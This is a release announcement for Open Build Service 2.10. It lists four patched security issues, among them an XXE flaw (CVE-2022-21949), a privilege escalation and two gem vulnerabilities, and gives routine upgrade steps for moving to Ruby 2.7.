Hey People, this release is fixing 4 security problems with 2.10 and you should update your installations as fast as possible. ## Fixed Issues 1. Fix XML external entity (XXE) injection with xmlhash gem (CVE-2022-21949) One of the Ruby gems we are using to parse XML was susceptible to this kind of attack. https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Pr... This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. 2. Fix a privilege escalation issue in ProjectDoProjectReleaseJob. https://github.com/openSUSE/open-build-service/pull/12407 This has only minor impact as an attacker would have to time job scheduling, which is next to impossible. 3. Fix heap memory corruption in the yajl-ruby gem For details see https://github.com/brianmario/yajl-ruby/security/advisories/GHSA-jj47-x69x-m... 4. Fix excessive backtracking in the nokogiri gem For details see https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-crjr-9rc5... ## Ruby 2.7 We have changed the ruby interpreter which requires a manual step when updating from a previous OBS version via packages: 1) Change Passenger to use ruby2.7 edit /etc/apache2/conf.d/mod_passenger.conf: PassengerRuby "/usr/bin/ruby.ruby2.7" 2) Setup the rake alternative if you have multiple rake versions installed update-alternatives --set rake /usr/bin/rake.ruby.ruby2.7 3) Restart apache2 service systemctl restart apache2 ## How to Update Package updates are available from the 2.10 repositories https://build.opensuse.org/project/show/OBS:Server:2.10 Fixed appliances can be downloaded from http://openbuildservice.org/download Henne -- Henne Vogelsang http://www.opensuse.org Everybody has a plan, until they get hit. - Mike Tyson